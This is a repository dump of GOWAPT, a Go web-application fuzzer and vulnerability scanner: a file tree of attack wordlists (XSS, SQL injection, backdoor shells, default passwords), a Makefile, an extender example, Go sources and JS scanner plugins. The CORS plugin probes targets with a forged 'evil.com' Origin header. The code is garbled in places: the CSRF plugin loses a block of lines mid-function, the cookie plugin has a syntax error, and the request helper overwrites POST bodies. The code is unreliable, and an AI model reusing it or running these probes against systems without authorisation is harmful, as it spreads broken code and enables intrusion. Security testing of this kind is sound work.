├── LICENSE ├── Makefile ├── README.md ├── extender └── example.js ├── plugins ├── apache-disc.js ├── cookie-httponly.js ├── cors-policy.js ├── csrf-attack.js └── xss-reflect.js ├── src ├── config.go ├── encoders.go ├── engine.go ├── extender.go ├── filter.go ├── fuzzer.go ├── fuzzmenu.go ├── global.go ├── gowpt.go ├── infomenu.go ├── mainmenu.go ├── print.go ├── scanengine.go ├── scanextender.go └── utils.go └── wordlist ├── Injections ├── All_attack.txt ├── SQL.txt ├── Traversal.txt ├── XML.txt ├── XSS.txt ├── bad_chars.txt └── sqlmap.txt ├── _copyright.txt ├── attack ├── all-attacks │ ├── all-attacks-unix.txt │ ├── all-attacks-win.txt │ └── all-attacks-xplatform.txt ├── business-logic │ ├── CommonDebugParamNames.txt │ ├── CommonMethodNames.txt │ └── DebugParams.Json.fuzz.txt ├── control-chars │ ├── HexValsAllBytes.txt │ ├── NullByteRepresentations.txt │ ├── imessage.txt │ └── terminal-escape-codes.txt ├── disclosure-directory │ └── directory-indexing-generic.txt ├── disclosure-localpaths │ └── unix │ │ └── common-unix-httpd-log-locations.txt ├── disclosure-source │ ├── source-disc-cmd-exec-traversal.txt │ ├── source-disclosure-generic.txt │ └── source-disclosure-microsoft.txt ├── email │ ├── invalid-email-addresses.txt │ └── valid-email-addresses.txt ├── file-upload │ ├── alt-extensions-asp.txt │ ├── alt-extensions-coldfusion.txt │ ├── alt-extensions-jsp.txt │ ├── alt-extensions-perl.txt │ ├── alt-extensions-php.txt │ ├── file-ul-filter-bypass-commonly-writable-directories.txt │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt │ ├── file-ul-filter-bypass-microsoft-asp.txt │ ├── file-ul-filter-bypass-ms-php.txt │ ├── file-ul-filter-bypass-x-platform-generic.txt │ ├── file-ul-filter-bypass-x-platform-php.txt │ ├── invalid-filenames-linux.txt │ ├── invalid-filenames-microsoft.txt │ ├── invalid-filesystem-chars-microsoft.txt │ ├── invalid-filesystem-chars-osx.txt │ └── malicious-images │ │ ├── POC_img_phpinfo-CR.gif │ │ ├── POC_img_phpinfo-LF-CR.gif │ │ ├── 
POC_phpinfo-metadata.gif │ │ ├── POC_phpinfo-metadata.jpg │ │ ├── eicar.com.txt │ │ ├── lottapixel.jpg │ │ ├── uber.gif │ │ └── xssproject.swf ├── format-strings │ └── format-strings.txt ├── html_js_fuzz │ ├── HTML5sec_Injections.txt │ ├── html_attributes.txt │ ├── html_tags.txt │ ├── javascript_events.txt │ ├── js_inject.txt │ └── quotationmarks.txt ├── http-protocol │ ├── crlf-injection.txt │ ├── hpp.txt │ ├── http-header-cache-poison.txt │ ├── http-protocol-methods.txt │ ├── http-request-header-field-names.txt │ ├── http-response-header-field-names.txt │ ├── known-uri-types.txt │ └── user-agents.txt ├── integer-overflow │ └── integer-overflows.txt ├── ip │ └── localhost.txt ├── json │ └── JSON_Fuzzing.txt ├── ldap │ └── ldap-injection.txt ├── lfi │ ├── JHADDIX_LFI.txt │ ├── common-ms-httpd-log-locations.txt │ └── common-unix-httpd-log-locations.txt ├── mimetypes │ └── MimeTypes.txt ├── no-sql-injection │ └── mongodb.txt ├── os-cmd-execution │ ├── Commands-Linux.txt │ ├── Commands-OSX.txt │ ├── Commands-Windows.txt │ ├── Commands-WindowsPowershell.txt │ ├── OSCommandInject.Windows.txt │ ├── command-execution-unix.txt │ ├── command-injection-template.txt │ ├── shell-delimiters.txt │ ├── shell-operators.txt │ ├── source-disc-cmd-exec-traversal.txt │ ├── useful-commands-unix.txt │ └── useful-commands-windows.txt ├── os-dir-indexing │ └── directory-indexing.txt ├── path-traversal │ ├── path-traversal-windows.txt │ └── traversals-8-deep-exotic-encoding.txt ├── redirect │ ├── redirect-injection-template.txt │ └── redirect-urls-template.txt ├── rfi │ └── rfi.txt ├── server-side-include │ └── server-side-includes-generic.txt ├── sql-injection │ ├── detect │ │ ├── GenericBlind.txt │ │ ├── Generic_SQLI.txt │ │ ├── MSSQL.txt │ │ ├── MSSQL_blind.txt │ │ ├── MySQL.txt │ │ ├── MySQL_MSSQL.txt │ │ ├── oracle.txt │ │ └── xplatform.txt │ ├── exploit │ │ ├── db2-enumeration.txt │ │ ├── ms-sql-enumeration.txt │ │ ├── mysql-injection-login-bypass.txt │ │ ├── 
mysql-read-local-files.txt │ │ └── postgres-enumeration.txt │ └── payloads-sql-blind │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ └── payloads-sql-blind-MySQL-WHERE.txt ├── string-expansion │ └── shell-expansion.txt ├── unicode │ ├── corrupted.txt │ ├── emoji.txt │ ├── japanese-emoticon.txt │ ├── naughty-unicode.txt │ ├── regionalindicators.txt │ ├── right-to-left.txt │ ├── specialchars.txt │ ├── two-byte-chars.txt │ └── upsidedown.txt ├── xml │ └── xml-attacks.txt ├── xpath │ └── xpath-injection.txt └── xss │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt │ ├── XSSPolyglot.txt │ ├── all-encodings-of-lt.txt │ ├── default-javascript-event-attributes.txt │ ├── html-event-attributes.txt │ ├── test.xxe │ ├── xss-other.txt │ ├── xss-rsnake.txt │ └── xss-uri.txt ├── ctfcommon ├── Filenames_PHP_All.txt ├── directory_wordlist.txt └── dirsearch.txt ├── discovery ├── UserAgent │ ├── UserAgentListCommon.txt │ ├── UserAgentListLarge.txt │ └── UserAgents.txt ├── dns │ ├── CcTLD.txt │ ├── alexaTop1mAXFRcommonSubdomains.txt │ ├── dnsmapCommonSubdomains.txt │ └── gTLD.txt └── predictable-filepaths │ ├── KitchensinkDirectories.txt │ ├── Randomfiles.txt │ ├── UnixDotfiles.txt │ ├── backdoors │ ├── ASP_CommonBackdoors.txt │ ├── bot_control_panels.txt │ └── shells.txt │ ├── cgi │ ├── CGI_HTTP_POST.txt │ ├── CGI_HTTP_POST_Windows.txt │ ├── CGI_Microsoft.txt │ └── CGI_XPlatform.txt │ ├── cms │ ├── drupal_plugins.txt │ ├── drupal_themes.txt │ ├── joomla_plugins.txt │ ├── joomla_themes.txt │ ├── php-nuke.txt │ ├── wordpress.txt │ ├── wp_common_theme_files.txt │ ├── wp_plugins.txt │ ├── wp_plugins_top225.txt │ ├── wp_themes.readme │ └── wp_themes.txt │ ├── filename-dirname-bruteforce │ ├── 3CharExtBrute.txt │ ├── CommonWebExtensions.txt │ ├── Extensions.Backup.txt │ ├── Extensions.Common.txt │ ├── Extensions.Compressed.txt │ ├── Extensions.Mostcommon.txt │ ├── 
Extensions.Skipfish.txt │ ├── WordlistSkipfish.txt │ ├── copy_of.txt │ ├── raft-large-directories-lowercase.txt │ ├── raft-large-directories.txt │ ├── raft-large-extensions-lowercase.txt │ ├── raft-large-extensions.txt │ ├── raft-large-files-lowercase.txt │ ├── raft-large-files.txt │ ├── raft-large-words-lowercase.txt │ ├── raft-large-words.txt │ ├── raft-medium-directories-lowercase.txt │ ├── raft-medium-directories.txt │ ├── raft-medium-extensions-lowercase.txt │ ├── raft-medium-extensions.txt │ ├── raft-medium-files-lowercase.txt │ ├── raft-medium-files.txt │ ├── raft-medium-words-lowercase.txt │ ├── raft-medium-words.txt │ ├── raft-small-directories-lowercase.txt │ ├── raft-small-directories.txt │ ├── raft-small-extensions-lowercase.txt │ ├── raft-small-extensions.txt │ ├── raft-small-files-lowercase.txt │ ├── raft-small-files.txt │ ├── raft-small-words-lowercase.txt │ ├── raft-small-words.txt │ ├── spanish.txt │ ├── test_demo.txt │ └── upload_variants.txt │ ├── login-file-locations │ ├── Logins.txt │ ├── cfm.txt │ ├── html.txt │ ├── jsp.txt │ ├── php.txt │ ├── windows-asp.txt │ └── windows-aspx.txt │ ├── password-file-locations │ └── Passwords.txt │ ├── php │ ├── PHP.txt │ └── PHP_CommonBackdoors.txt │ ├── proxy-conf.txt │ ├── tftp.txt │ ├── webservers-appservers │ ├── ADFS.txt │ ├── AdobeXML.txt │ ├── Apache.txt │ ├── ApacheTomcat.txt │ ├── Apache_Axis.txt │ ├── ColdFusion.txt │ ├── FatwireCMS.txt │ ├── Frontpage.txt │ ├── HP_System_Mgmt_Homepage.txt │ ├── HTTP_POST_Microsoft.txt │ ├── Hyperion.txt │ ├── IIS.txt │ ├── JBoss.txt │ ├── JRun.txt │ ├── JavaServlets_Common.txt │ ├── Joomla_exploitable.txt │ ├── LotusNotes.txt │ ├── Netware.txt │ ├── Oracle9i.txt │ ├── OracleAppServer.txt │ ├── Ruby_Rails.txt │ ├── SAP.txt │ ├── Sharepoint.txt │ ├── SiteMinder.txt │ ├── SunAppServerGlassfish.txt │ ├── SuniPlanet.txt │ ├── Vignette.txt │ ├── Weblogic.txt │ └── Websphere.txt │ └── wellknown-rfc5785.txt ├── general ├── admin-panels.txt ├── big.txt ├── catala.txt ├── 
common.txt ├── euskera.txt ├── extensions_common.txt ├── http_methods.txt ├── medium.txt ├── megabeast.txt ├── mutations_common.txt ├── spanish.txt └── test.txt ├── others ├── common_pass.txt └── names.txt ├── regex ├── amazon.txt ├── breakpoint-ignores.txt ├── errors.txt ├── nsa-wordlist.txt ├── pii.readme.txt ├── pii.txt └── sessionid.txt ├── stress ├── alphanum_case.txt ├── alphanum_case_extra.txt ├── char.txt ├── doble_uri_hex.txt ├── test_ext.txt └── uri_hex.txt ├── vulns ├── apache.txt ├── cgis.txt ├── coldfusion.txt ├── dirTraversal-nix.txt ├── dirTraversal-win.txt ├── dirTraversal.txt ├── domino.txt ├── fatwire.txt ├── fatwire_pagenames.txt ├── frontpage.txt ├── iis.txt ├── iplanet.txt ├── jrun.txt ├── netware.txt ├── oracle9i.txt ├── sharepoint.txt ├── sql_inj.txt ├── sunas.txt ├── tests.txt ├── tomcat.txt ├── vignette.txt ├── weblogic.txt └── websphere.txt ├── webservices ├── ws-dirs.txt └── ws-files.txt ├── wordlists-misc ├── accidental_profanity.txt ├── common-http-ports.txt ├── numeric.txt ├── us_cities.txt ├── wordlist-alphanumeric-case.txt ├── wordlist-common-snmp-community-strings.txt └── wordlist-dna.txt └── wordlists-user-passwd ├── db2 ├── db2_default_pass.txt ├── db2_default_user.txt └── db2_default_userpass.txt ├── faithwriters.txt ├── generic-listpairs ├── http_default_pass.txt ├── http_default_userpass.txt └── http_default_users.txt ├── names └── namelist.txt ├── oracle ├── _hci_oracle_passwords.txt ├── _oracle_default_passwords.txt ├── oracle_login_password.txt ├── oracle_logins.txt └── oracle_passwords.txt ├── passwds ├── john.txt ├── phpbb.txt ├── twitter.txt └── weaksauce.txt ├── postgres ├── postgres_default_pass.txt ├── postgres_default_user.txt └── postgres_default_userpass.txt ├── readme.txt ├── tomcat ├── tomcat_mgr_default_pass.txt ├── tomcat_mgr_default_userpass.txt └── tomcat_mgr_default_users.txt └── unix-os ├── unix_passwords.txt └── unix_users.txt /Makefile: 
-------------------------------------------------------------------------------- 1 | # GOWPT - Makefile 2 | # global variables 3 | GO=$(shell which go) 4 | OUTFILE=gowapt 5 | SOURCEDIR=src 6 | INSTALLDIR=/usr/local/bin/ 7 | 8 | 9 | # Do not touch these! NOTE(review): DEPS are fetched with a plain "go get", i.e. unpinned and at whatever revision is current; pin versions (e.g. go.mod/go.sum) so builds are reproducible and checksummed. 10 | SOURCES := $(shell find $(SOURCEDIR) -name '*.go') 11 | DEPS = github.com/nsf/termbox-go golang.org/x/net/html github.com/robertkrimen/otto github.com/elazarl/goproxy 12 | 13 | gowpt: 14 | $(info Remember to set GOPATH!) 15 | $(info Downloading dependencies $(DEPS)) 16 | $(foreach var,$(DEPS),$(GO) get $(var);) 17 | $(GO) build -ldflags="-s -w" -o $(OUTFILE) $(SOURCES) 18 | 19 | install: 20 | install -m 755 $(OUTFILE) $(INSTALLDIR) 21 | rm -f $(OUTFILE) 22 | 23 | .PHONY: clean 24 | 25 | clean: 26 | rm -f $(OUTFILE) 27 | -------------------------------------------------------------------------------- /extender/example.js: -------------------------------------------------------------------------------- 1 | /* 2 | * Create a custom encoder called helloworld 3 | * 4 | * This encoder just adds the string "_helloworld" to every payload 5 | * coming from the wordlist (as written, myenc below appends "_helloword") 6 | */ 7 | addCustomEncoder("helloworld", myenc); 8 | /* 9 | * Define the callback method for the helloworld encoder 10 | */ 11 | function myenc(data) { 12 | return data + "_helloword"; 13 | } 14 | /* 15 | * Create an HTTP interceptor 16 | * 17 | * The interceptor will hook every request / response. 18 | * It is possible to modify a request before sending it; the response item, however, 19 | * is just a shadow copy of the one received from the server, so no modifications 20 | * are possible 21 | * 22 | * 23 | * request_response is an object which may contain either an http.Request 24 | * or an http.Response; to know which one is contained, check the is_request flag 25 | * 26 | * REMEMBER! request_response is an http.* object so you must interact with 27 | * this one just like you would do in golang! 
28 | * 29 | * dumpResponse is a built-in function which dumps the full request-response to 30 | * disk. The file is created with mode 0644 and contains everything the response carries (Set-Cookie values, tokens), so point it at a private directory rather than a shared one such as /tmp. 31 | * result is an object filled with stats about the response; it contains these fields 32 | * 33 | * result.tags => Number of tags in the response 34 | * result.code => HTTP Response status 35 | * result.words => Number of words in the response 36 | * result.lines => Number of lines in the response 37 | * result.chars => Number of chars in the response 38 | * result.request => Full dump of the request 39 | * result.response => Full dump of the response 40 | * result.response => The injected payload 41 | * 42 | */ 43 | setHTTPInterceptor(function(request_response, result, is_request){ 44 | if(is_request){ 45 | request_response.Header.Set("Hello", "world") 46 | }else{ 47 | dumpResponse(request_response, "/tmp/dump.txt") 48 | /* 49 | * Send an HTTP request in a synchronous way 50 | * 51 | * This API accepts 4 parameters: 52 | * method => GET | POST | HEAD | PUT | PATCH | UPDATE 53 | * url => The url of the HTTP service 54 | * post_data => The content of request bodyBytes 55 | * headers => A javascript dictionary {headerName => headerValue} 56 | * 57 | * The response object may be null or undefined or an http.Response from golang 58 | */ 59 | var response = sendRequestSync("GET", "http://example.com/", null, {"Fake": "Header"}) 60 | } 61 | }) 62 | -------------------------------------------------------------------------------- /plugins/apache-disc.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | Apache-Disclosure 6 | 7 | This plugin tries to find a non-standard Apache Server header 8 | 9 | */ 10 | 11 | apache = Scanner.registerPlugin("Apache-Disc", "Try to check for non standard Apache Server Header", ScanType.RISK_NOT_INVASIVE) 12 | 13 | 14 | function test(base_request){ 15 | vulnerabilities = [] 16 | response = Http.sendRequest(base_request) 17 | server = response.Header.Get("Server") 18 | if(server 
!= "") { 19 | if(String(server).indexOf("Apache") !== -1 && String(server).length > 10){ 20 | vuln = Scanner.makePassedTest( 21 | "Apache diclose information via Server Header", 22 | Utils.httpToString(base_request), 23 | Utils.httpToString(response), 24 | server, 25 | {"name": "Server"}, 26 | Vuln.CONFIDENCE_FIRM, 27 | Severity.INFO, 28 | apache 29 | ) 30 | vulnerabilities.push(vuln) 31 | } 32 | } 33 | return vulnerabilities 34 | } 35 | -------------------------------------------------------------------------------- /plugins/cookie-httponly.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | Cookie-httpOnly 6 | 7 | This plugin tries to find cookies that lack the HttpOnly attribute. NOTE(review): HttpOnly is an attribute of the Set-Cookie response header, while test() below reads the "Cookie" parameter of base_request, which presumably never carries it, so every cookie would be reported - confirm against Utils.getParameter. 8 | 9 | */ 10 | 11 | cookie = Scanner.registerPlugin("Cookie-httpOnly", "Try to check for non httpOnly", ScanType.RISK_NOT_INVASIVE) 12 | 13 | 14 | function test(base_request){ 15 | vulnerabilities = [] 16 | cookieval = Utils.getParameter(base_request,"Cookie") 17 | if(cookieval != null) { 18 | if(String(cookieval.curVal)toLowerCase().indexOf(" httponly") == -1){ 19 | vuln = Scanner.makePassedTest( 20 | "Cookies are not protected against Javascript", 21 | Utils.httpToString(base_request), 22 | "", 23 | cookieval.curValue, 24 | cookieval, 25 | Vuln.CONFIDENCE_FIRM, 26 | Severity.LOW, 27 | cookie 28 | ) 29 | vulnerabilities.push(vuln) 30 | } 31 | } 32 | return vulnerabilities 33 | } 34 | -------------------------------------------------------------------------------- /plugins/cors-policy.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | CORS-Policy 6 | 7 | This plugin tries to check for a bad CORS policy. NOTE(review): test() below only inspects Access-Control-Allow-Origin; a bare "*" is not honoured by browsers for credentialed requests, so the reflected-origin case (ideally together with Access-Control-Allow-Credentials: true) is the higher-risk finding, yet both are reported at the same severity. 8 | 9 | */ 10 | 11 | cors = Scanner.registerPlugin("CORS-Policy", "Try to check for for bad CORS policy", ScanType.RISK_NOT_INVASIVE) 12 | 13 | 14 | function test(base_request){ 15 | vulnerabilities = [] 16 | Utils.addParameter("Origin","http://www.evil.com", 
Param.POSITION_HEADER, base_request) 17 | response = Http.sendRequest(base_request) 18 | policy = response.Header.Get("Access-Control-Allow-Origin") 19 | if(policy == "*" || policy.indexOf("http://www.evil.com") !== -1) { 20 | vuln = Scanner.makePassedTest( 21 | "Cross domain request are possible due to bad CORS policy", 22 | Utils.httpToString(base_request), 23 | Utils.httpToString(response), 24 | "Access-Control-Allow-Origin: "+policy, 25 | {"name": "CORS"}, 26 | Vuln.CONFIDENCE_CERTAIN, 27 | Severity.HIGH, 28 | cors 29 | ) 30 | vulnerabilities.push(vuln) 31 | } 32 | return vulnerabilities 33 | } 34 | -------------------------------------------------------------------------------- /plugins/csrf-attack.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | CSRF-Attack 6 | 7 | This plugin try to detect CSRF vulnerable requests 8 | 9 | */ 10 | 11 | csrf = Scanner.registerPlugin("CSRF-Attack", "Try to detect CSRF vulnerable requests", ScanType.RISK_MID_INVASIVE) 12 | 13 | function requestToBody(req){ 14 | response = Http.sendRequest(req) 15 | response_string = Utils.httpToString(response) 16 | response_body = String(response_string).substring(String(response_string).indexOf('\r\n\r\n')+4) 17 | return [response, response_body] 18 | } 19 | 20 | function test(base_request){ 21 | vulnerable = true 22 | vulnerabilities = [] 23 | response = requestToBody(base_request) 24 | all_parameters = Utils.getAllParameters(base_request) 25 | forLoop: 26 | for(var i=0; i"}, 51 | Vuln.CONFIDENCE_POSSIBLE, 52 | Severity.MEDIUM, 53 | csrf 54 | ) 55 | vulnerabilities.push(vuln) 56 | } 57 | return vulnerabilities 58 | } 59 | -------------------------------------------------------------------------------- /src/encoders.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/md5" 5 | "crypto/sha1" 6 | "crypto/sha256" 7 | "encoding/base32" 8 | 
"encoding/base64" 9 | "fmt" 10 | ) 11 | 12 | var encoders = map[string]Encoder{} 13 | 14 | func _url(str string) string { 15 | tmp := "" 16 | for _, val := range str { 17 | tmp += fmt.Sprintf("%%%x", val) 18 | } 19 | return tmp 20 | } 21 | 22 | func urlurl(str string) string { 23 | return _url(_url(str)) 24 | } 25 | 26 | func _html(str string) string { 27 | tmp := "" 28 | for _, val := range str { 29 | tmp += fmt.Sprintf("&#%d;", val) 30 | } 31 | return tmp 32 | } 33 | 34 | func htmlhex(str string) string { 35 | tmp := "" 36 | for _, val := range str { 37 | tmp += fmt.Sprintf("&#x%x;", val) 38 | } 39 | return tmp 40 | } 41 | 42 | func unicode(str string) string { 43 | tmp := "" 44 | for _, val := range str { 45 | tmp += fmt.Sprintf("\\u00%x", val) 46 | } 47 | return tmp 48 | } 49 | 50 | func hex(str string) string { 51 | tmp := "" 52 | for _, val := range str { 53 | tmp += fmt.Sprintf("\\x%x", val) 54 | } 55 | return tmp 56 | } 57 | 58 | func md5hash(str string) string { 59 | return fmt.Sprintf("%x", md5.Sum([]byte(str))) 60 | } 61 | 62 | func sha1hash(str string) string { 63 | return fmt.Sprintf("%x", sha1.Sum([]byte(str))) 64 | } 65 | 66 | func sha2hash(str string) string { 67 | return fmt.Sprintf("%x", sha256.Sum256([]byte(str))) 68 | } 69 | 70 | func b64(str string) string { 71 | return base64.StdEncoding.EncodeToString([]byte(str)) 72 | } 73 | 74 | func b32(str string) string { 75 | return base32.StdEncoding.EncodeToString([]byte(str)) 76 | } 77 | 78 | func plain(str string) string { 79 | return str 80 | } 81 | 82 | func initEncoders() { 83 | encoders["url"] = Encoder(_url) 84 | encoders["urlurl"] = Encoder(urlurl) 85 | encoders["html"] = Encoder(_html) 86 | encoders["htmlhex"] = Encoder(htmlhex) 87 | encoders["unicode"] = Encoder(unicode) 88 | encoders["hex"] = Encoder(hex) 89 | encoders["md5hash"] = Encoder(md5hash) 90 | encoders["sha1hash"] = Encoder(sha1hash) 91 | encoders["sha2hash"] = Encoder(sha2hash) 92 | encoders["b64"] = Encoder(b64) 93 | 
encoders["b32"] = Encoder(b32) 94 | encoders["plain"] = Encoder(plain) 95 | } 96 | -------------------------------------------------------------------------------- /src/extender.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io/ioutil" 6 | "net/http" 7 | "net/url" 8 | "strings" 9 | 10 | "github.com/robertkrimen/otto" 11 | ) 12 | 13 | func initExtender() { 14 | JSVM.Set("addCustomEncoder", func(name string, f otto.Value) { 15 | encoders[name] = Encoder(func(x string) string { 16 | v, _ := f.Call(otto.NullValue(), x) 17 | sv, _ := v.ToString() 18 | return sv 19 | }) 20 | }) 21 | 22 | JSVM.Set("setHTTPInterceptor", func(f otto.Value) { 23 | haveHTTPInterceptor = true 24 | var v otto.Value 25 | callback := func(x interface{}, y interface{}, b bool) { 26 | if b { 27 | v, _ = f.Call(otto.NullValue(), x, otto.NullValue(), otto.TrueValue()) 28 | } else { 29 | v, _ = f.Call(otto.NullValue(), x, y, otto.FalseValue()) 30 | } 31 | } 32 | HTTPInterceptor = JSHTTPInterceptor(callback) 33 | _ = v 34 | }) 35 | 36 | JSVM.Set("dumpResponse", func(req_resp interface{}, path string) otto.Value { 37 | switch obj := req_resp.(type) { 38 | case *http.Response: 39 | content := response2String(obj) 40 | err := ioutil.WriteFile(path, content, 0644) 41 | if err != nil { 42 | return otto.FalseValue() 43 | } 44 | return otto.TrueValue() 45 | default: 46 | return otto.FalseValue() 47 | } 48 | }) 49 | 50 | JSVM.Set("sendRequestSync", func(method otto.Value, http_url otto.Value, post_data otto.Value, headers interface{}) interface{} { 51 | method_str, m_err := method.ToString() 52 | url_str, u_err := http_url.ToString() 53 | post_str, p_err := post_data.ToString() 54 | if m_err == nil && u_err == nil && p_err == nil { 55 | if post_str != "null" { 56 | post_str = "POST" 57 | } else { 58 | post_str = "" 59 | } 60 | tmp_url, url_err := url.ParseRequestURI(url_str) 61 | tmp_post, post_err := 
url.ParseQuery(post_str) 62 | tmp_req, req_err := http.NewRequest(method_str, tmp_url.String(), strings.NewReader(tmp_post.Encode())) 63 | if req_err == nil && post_err == nil && url_err == nil { 64 | for v, k := range headers.(map[string]interface{}) { 65 | tmp_req.Header.Add(v, k.(string)) 66 | } 67 | response, err := netClient.Do(tmp_req) 68 | if err == nil { 69 | return response 70 | } else { 71 | return nil 72 | } 73 | } else { 74 | return nil 75 | } 76 | } else { 77 | return nil 78 | } 79 | }) 80 | 81 | JSVM.Set("panic", func(v interface{}) { 82 | panic(fmt.Sprintf("%v", v)) 83 | }) 84 | } 85 | 86 | func runExtension(file string) { 87 | script, _ := ioutil.ReadFile(file) 88 | _, err := JSVM.Run(string(script)) 89 | if err != nil { 90 | fmt.Printf("JS Error: %v\n", err) 91 | badConfig() 92 | } 93 | } 94 | -------------------------------------------------------------------------------- /src/filter.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "regexp" 7 | "strconv" 8 | ) 9 | 10 | type opMethod func(int, int) bool 11 | 12 | var usefilter = false 13 | 14 | var ops = map[string]opMethod{} 15 | 16 | var vars = map[string]*int{} 17 | 18 | var filter = map[int][]string{} 19 | 20 | func gt(x int, y int) bool { 21 | return x > y 22 | } 23 | 24 | func lt(x int, y int) bool { 25 | return x < y 26 | } 27 | 28 | func eq(x int, y int) bool { 29 | return x == y 30 | } 31 | 32 | func neq(x int, y int) bool { 33 | return x != y 34 | } 35 | 36 | func initFilters(filt string, stats *Stats) { 37 | if filt != "" { 38 | usefilter = true 39 | ops[">"] = opMethod(gt) 40 | ops["<"] = opMethod(lt) 41 | ops["=="] = opMethod(eq) 42 | ops["!="] = opMethod(neq) 43 | vars["chars"] = &stats.chars 44 | vars["code"] = &stats.code 45 | vars["length"] = &stats.length 46 | vars["lines"] = &stats.lines 47 | vars["words"] = &stats.words 48 | vars["tags"] = &stats.tags 49 | var tmp_filter_index = 0 50 | 
groups := RegSplit(filt, "(&&)") 51 | for _, group := range groups { 52 | r, _ := regexp.Compile("(?P[a-z]+)(\\s{0,100})(?P(<|>|\\|\\||==|!=))(\\s{0,100})(?P[-\\d]+)") 53 | check := r.FindStringSubmatch(group) 54 | if _, ok := vars[check[variable]]; ok { 55 | filter[tmp_filter_index] = append(filter[tmp_filter_index], check[variable]) 56 | filter[tmp_filter_index] = append(filter[tmp_filter_index], check[op]) 57 | filter[tmp_filter_index] = append(filter[tmp_filter_index], check[data]) 58 | tmp_filter_index++ 59 | } else { 60 | fmt.Printf("Error: Filter error, parameter '%s' does not exists.\n", check[variable]) 61 | os.Exit(-1) 62 | } 63 | } 64 | } 65 | } 66 | 67 | func RegSplit(text string, delimeter string) []string { 68 | reg := regexp.MustCompile(delimeter) 69 | indexes := reg.FindAllStringIndex(text, -1) 70 | laststart := 0 71 | result := make([]string, len(indexes)+1) 72 | for i, element := range indexes { 73 | result[i] = text[laststart:element[0]] 74 | laststart = element[1] 75 | } 76 | result[len(indexes)] = text[laststart:len(text)] 77 | return result 78 | } 79 | 80 | func checkFilter() bool { 81 | if !usefilter { 82 | return true 83 | } else { 84 | flag := true 85 | for _, val := range filter { 86 | i, _ := strconv.Atoi(val[2]) 87 | flag = ops[val[1]](*vars[val[0]], i) && flag 88 | } 89 | return flag 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /src/gowpt.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | 6 | "github.com/nsf/termbox-go" 7 | ) 8 | 9 | func parseCli() Configuration { 10 | var url = flag.String("u", "", "URL to fuzz") 11 | var template = flag.String("t", "", "Template for request") 12 | var postdata = flag.String("d", "", "POST data for request") 13 | var ssl = flag.Bool("ssl", false, "Use SSL") 14 | var wordlist = flag.String("w", "", "Wordlist file") 15 | var usefuzzer = flag.Bool("fuzz", false, "Use 
the built-in fuzzer") 16 | var filter = flag.String("f", "", "Filter the results") 17 | var threads = flag.Int("threads", 10, "Number of threads") 18 | var encoders = flag.String("e", "plain", "A list of comma separated encoders") 19 | var cookies = flag.String("c", "", "A list of cookies") 20 | var upstream = flag.String("p", "", "Use upstream proxy") 21 | var auth = flag.String("a", "", "Basic authentication (user:password)") 22 | var extension = flag.String("x", "", "Extension file example.js") 23 | var viaproxy = flag.Bool("from-proxy", false, "Get the request via a proxy server") 24 | var scanner = flag.Bool("scanner", false, "Run in scanning mode") 25 | var plugin_dir = flag.String("plugin-dir", "", "Directory containing all scanning module") 26 | flag.Var(&headers, "H", "A list of additional headers") 27 | flag.Parse() 28 | config = Configuration{url: *url, 29 | template: *template, postdata: *postdata, 30 | ssl: *ssl, wordlist: *wordlist, usefuzzer: *usefuzzer, 31 | filter: *filter, threads: *threads, encoders: *encoders, 32 | cookies: *cookies, upstream_proxy: *upstream, auth: *auth, 33 | extension: *extension, headers: headers, from_proxy: *viaproxy, 34 | scanner: *scanner, plugin_dir: *plugin_dir} 35 | config = checkConfig(&config) 36 | return config 37 | } 38 | 39 | func main() { 40 | cfg := parseCli() 41 | if !cfg.scanner { 42 | err := termbox.Init() 43 | if err != nil { 44 | panic(err) 45 | } 46 | defer termbox.Close() 47 | termbox.SetInputMode(termbox.InputEsc) 48 | termbox.SetOutputMode(termbox.Output256) 49 | mainMenu(cfg) 50 | } else { 51 | initScanner(&cfg) 52 | err := termbox.Init() 53 | if err != nil { 54 | panic(err) 55 | } 56 | defer termbox.Close() 57 | termbox.SetInputMode(termbox.InputEsc) 58 | termbox.SetOutputMode(termbox.Output256) 59 | initPrints() 60 | started = true 61 | go startScanEngine(cfg.base_request, &ScannerPlugins) 62 | fuzz_menu_is_fuzz = false 63 | fuzzMenu() 64 | } 65 | } 66 | 
-------------------------------------------------------------------------------- /src/infomenu.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "github.com/nsf/termbox-go" 5 | ) 6 | 7 | func infoHandleEvents(ev termbox.Event) interface{} { 8 | switch ev.Type { 9 | case termbox.EventError: 10 | panic(ev.Err) 11 | case termbox.EventKey: 12 | if haveCallbackDefined("info", int(ev.Ch)) { 13 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 14 | infoInitTerminal() 15 | return checkCallback("info", int(ev.Ch)) 16 | //termbox.Flush() 17 | } 18 | case termbox.EventResize: 19 | infoInitTerminal() 20 | default: 21 | infoInitTerminal() 22 | } 23 | return nil 24 | } 25 | 26 | func infoInitTerminal() { 27 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 28 | if _, _, correctSize := checkSize(); correctSize { 29 | drawHeader("^7Go Web Application Penetration Test made with ^1❤ ^7by DZONERZY") 30 | drawCenterCenterAlign(termbox.ColorWhite, termbox.ColorDefault, "Go Web Application Pentration Test\n"+ 31 | "made by DZONERZY\n"+ 32 | "GOWAPT is an active WebApp fuzzer\n"+ 33 | "it can be used to check for common/uncommon vulnerabilities\n"+ 34 | "GOWAPT it's more then a scanner, it may help you secure you application\n"+ 35 | "finding and exploitig web application vulnerabilities\n"+ 36 | "GOWAPT 